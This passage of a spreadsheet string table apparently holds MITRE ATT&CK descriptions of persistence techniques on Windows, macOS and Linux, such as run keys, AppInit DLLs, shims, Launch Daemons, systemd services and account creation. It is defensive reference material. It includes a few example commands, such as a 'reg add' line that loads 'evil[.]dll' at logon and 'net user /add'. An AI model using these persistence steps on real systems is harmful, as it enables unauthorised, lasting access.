Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. </t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the &lt;code&gt;AppInit_DLLs&lt;/code&gt; value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)
Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. 
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)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hooking to redirect the code as necessary in order to communicate with the OS. 
A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:
* &lt;code&gt;%WINDIR%\AppPatch\sysmain.sdb&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb&lt;/code&gt;
Custom databases are stored in:
* &lt;code&gt;%WINDIR%\AppPatch\custom &amp; %WINDIR%\AppPatch\AppPatch64\Custom&lt;/code&gt; and
* &lt;code&gt;hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom&lt;/code&gt;
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.</t>
  </si>
  <si>
    <t>Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows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t>
  </si>
  <si>
    <t>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to &lt;code&gt;rc.local&lt;/code&gt;, &lt;code&gt;rc.common&lt;/code&gt;, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</t>
  </si>
  <si>
    <t>Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)
In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template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loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
Word Normal.dotm location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm&lt;/code&gt;
Excel Personal.xlsb location:&lt;br&gt;
&lt;code&gt;C:\Users\&amp;lt;username&amp;gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB&lt;/code&gt;
Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under &lt;code&gt;C:\Program Files (x86)\Microsoft Office\root\Office16\&lt;/code&gt;, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</t>
  </si>
  <si>
    <t>Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: &lt;code&gt;Get{Extension/Filter}Version&lt;/code&gt;, &lt;code&gt;Http{Extension/Filter}Proc&lt;/code&gt;, and (optionally) &lt;code&gt;Terminate{Extension/Filter}&lt;/code&gt;. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)
Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports &lt;code&gt;RegisterModule&lt;/code&gt;, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts. </t>
  </si>
  <si>
    <t>Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: &lt;code&gt;svchost.exe&lt;/code&gt;) load the service's DLL file, the location of which is stored in a Registry entry named &lt;code&gt;ServiceDll&lt;/code&gt;.(Citation: Microsoft System Services Fundamentals) The &lt;code&gt;termsrv.dll&lt;/code&gt; file, typically stored in `%SystemRoot%\System32\`, is the default &lt;code&gt;ServiceDll&lt;/code&gt; value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal &lt;code&gt;termsrv.dll&lt;/code&gt; functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the &lt;code&gt;termsrv.dll&lt;/code&gt; file or modifying the &lt;code&gt;ServiceDll&lt;/code&gt; value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. </t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;/code&gt;
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is &lt;code&gt;C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;/code&gt;. The startup folder path for all users is &lt;code&gt;C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp&lt;/code&gt;.
The following Registry keys can be used to set startup folder items for persistence:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;/code&gt;
The following Registry keys can control automatic startup of services during boot:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices&lt;/code&gt;
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&lt;/code&gt;
Programs listed in the load value of the registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; run automatically for the currently logged-on user.
By default, the multistring &lt;code&gt;BootExecute&lt;/code&gt; value of the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager&lt;/code&gt; is set to &lt;code&gt;autocheck autochk *&lt;/code&gt;. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.
Once an adversary has created a cloud account, they can then manipulate that account to ensure persistence and allow access to additional resources - for example, by adding [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).</t>
  </si>
  <si>
    <t>Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the &lt;code&gt;net user /add /domain&lt;/code&gt; command can be used to create a domain account.
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. 
For example, with a sufficient level of access, the Windows &lt;code&gt;net user /add&lt;/code&gt; command can be used to create a local account. On macOS systems the &lt;code&gt;dscl -create&lt;/code&gt; command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as &lt;code&gt;username&lt;/code&gt;, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.</t>
  </si>
  <si>
    <t>Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Required Launch Daemons parameters include a &lt;code&gt;Label&lt;/code&gt; to identify the task, &lt;code&gt;Program&lt;/code&gt; to provide a path to the executable, and &lt;code&gt;RunAtLoad&lt;/code&gt; to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to &lt;code&gt;true&lt;/code&gt; and the &lt;code&gt;Program&lt;/code&gt; parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)
Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as &lt;code&gt;usr/local/bin&lt;/code&gt; to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)</t>
  </si>
  <si>
    <t>Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
Adversaries may abuse Active Setup by creating a key under &lt;code&gt; HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\&lt;/code&gt; and setting a malicious value for &lt;code&gt;StubPath&lt;/code&gt;. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)
Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&amp;lt;target binary&amp;gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</t>
  </si>
  <si>
    <t>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call &lt;code&gt;SMLoginItemSetEnabled&lt;/code&gt;.
Login items installed using the Service Management Framework leverage &lt;code&gt;launchd&lt;/code&gt;, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as &lt;code&gt;tell application “System Events” to make login item at end with properties /path/to/executable&lt;/code&gt;.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in &lt;code&gt;~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm&lt;/code&gt;.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)</t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. 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process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.</t>
  </si>
  <si>
    <t>Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. 
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.  
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) 
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)  
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts. 
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.  
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) </t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)
Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the &lt;code&gt;AddPrintProcessor&lt;/code&gt; API call with an account that has &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt; enabled. Alternatively, a print processor can be registered to the print spooler service by adding the &lt;code&gt;HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver&lt;/code&gt; Registry key that points to the DLL.
For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)
The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; within the &lt;code&gt;~/Library/Preferences/ByHost&lt;/code&gt; directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; file to execute payloads when a user logs in.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).
